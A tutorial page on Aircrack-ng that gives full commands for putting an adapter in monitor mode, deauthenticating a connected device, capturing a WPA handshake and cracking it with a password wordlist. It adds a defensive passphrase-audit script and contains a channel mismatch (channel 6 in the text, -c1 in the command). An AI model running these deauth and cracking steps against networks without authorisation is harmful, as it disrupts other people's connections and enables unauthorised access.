# Aircrack-ng

## Tutorial Video

{% embed url="<https://www.youtube.com/watch?v=zAWcu3NQLME>" %}

## Requirements

* Wi-Fi adapter that supports monitor mode.
* Linux machine or virtual machine.
* Aircrack-ng.
* List of common passwords. <https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt>

Step 1: Installation

```
sudo apt update
sudo apt-get install -y aircrack-ng 
```

Step 2: Check the available Wi-Fi cards and disable any processes that may interfere with monitor mode.

```
ip a
```

<figure><img src="/files/nZFjTiEk9q5qEwjLk7pQ" alt=""><figcaption></figcaption></figure>

The internal Wi-Fi card can interfere with the deauth process, so we bring it down with this command.

```
sudo ifconfig wlan0 down
```

This command checks for any processes that may interfere with our Wi-Fi adapter in monitor mode.

```
sudo airmon-ng check
```

This command then kills any of the processes listed from the command above.

```
sudo airmon-ng check kill
```

<figure><img src="/files/6cQ8ZrxhSvtLOtI5X3lZ" alt=""><figcaption></figcaption></figure>

Step 3: The next command will set the Wi-Fi adapter into monitor mode.

```
sudo airmon-ng start wlan1
```

<figure><img src="/files/4nd5agemmYlgNb11USHw" alt=""><figcaption></figcaption></figure>

Step 4: Next we want to grab the hex value (the BSSID) of our target network.

```
sudo airodump-ng wlan1mon
```

<figure><img src="/files/ufAvGRDrNwo3bRaCIU7t" alt=""><figcaption></figcaption></figure>

Our hotspot named TestNetwork seems to be operating on channel 6 with the MAC address shown.

Step 5: Now we only want to listen to devices trying to connect to our target network so we run the following command.

```
sudo airodump-ng -c1 -w capture -d (YOUR TARGET'S HEX VALUE) wlan1mon
```

<figure><img src="/files/WBQg5nI9WjuNDqSDW7pA" alt=""><figcaption></figcaption></figure>

Step 6: Now we can see the network and a device that is currently connected. We want to deauth this device from the network and capture the WPA handshake when it attempts to re-join the network.

```
sudo aireplay-ng --deauth 0 -a (NETWORK HASH) -c (DEVICE HASH) wlan1mon
```

{% hint style="info" %}
The network hash is the first BSSID and the device hash is the second listed station.
{% endhint %}

<figure><img src="/files/F11fas95X2qQd7wqIC7j" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wxSrtIOmlUVj0L3d9Ko2" alt=""><figcaption></figcaption></figure>

Step 7: Once we have captured the WPA handshake, we can turn off monitor mode on our adapter and attempt to crack the password using a list of commonly used passwords.

```
sudo airmon-ng stop wlan1mon
```

<figure><img src="/files/AOAZvfHfjcKLHTBgJexE" alt=""><figcaption></figcaption></figure>

```
sudo aircrack-ng (YOUR CAPTURE FILE) -w (YOUR PASSWORD LIST DIRECTORY) 
```

{% hint style="info" %}
Your capture file will be saved to your device. There may be multiple capture files so use the most recent one created.
{% endhint %}

<figure><img src="/files/kjf6dWYxkvq8ISxE7K4v" alt=""><figcaption></figcaption></figure>
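
A defensive check that follows from Step 7, as an added example that is not part of the original tutorial: the crack only succeeds when the passphrase is in the wordlist, so you can audit your own network's passphrase against the same list. The function names and the sample wordlist are constructed for illustration; the 8 to 63 character range is the WPA/WPA2 passphrase length limit.

```bash
#!/usr/bin/env bash
# Added example (not from the original tutorial): audit your own passphrase
# against a wordlist such as the 10k list in Requirements.
# All function names and the sample wordlist below are constructed.

# WPA/WPA2-PSK passphrases are 8..63 characters, so shorter or longer
# wordlist entries can never match a real passphrase.
wpa_candidate_count() {   # usage: wpa_candidate_count <wordlist>
    awk 'length($0) >= 8 && length($0) <= 63 { n++ } END { print n + 0 }' "$1"
}

audit_passphrase() {      # usage: audit_passphrase <passphrase> <wordlist>
    if [ "${#1}" -lt 8 ] || [ "${#1}" -gt 63 ]; then
        echo "invalid-length"; return 2
    fi
    # -F literal string, -x whole line, -q quiet; "--" protects a leading "-".
    if grep -Fxq -- "$1" "$2"; then
        echo "in-wordlist"; return 1
    fi
    # A case variant of a listed word is a trivial mutation, so flag it too.
    if grep -Fxqi -- "$1" "$2"; then
        echo "case-variant-in-wordlist"; return 1
    fi
    echo "not-in-wordlist"; return 0
}

make_sample_wordlist() {  # writes a constructed wordlist, prints its path
    sample_file=$(mktemp)
    printf '%s\n' password 123456 qwerty 12345678 letmein sunshine1 iloveyou \
        > "$sample_file"
    echo "$sample_file"
}

# Typical use against the list from Requirements:
#   audit_passphrase 'YourOwnPassphrase' 10k-most-common.txt
```

A `not-in-wordlist` result only says that this one list misses the passphrase; a long, random passphrase is what keeps it out of larger lists as well.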

Step 8: Congrats!!! 🥳🥳🥳 You have just learned how to use Aircrack-ng to capture and crack a WPA handshake.

{% hint style="info" %}
I am not liable for any misuse of this knowledge. This tutorial is for educational purposes only.
{% endhint %}


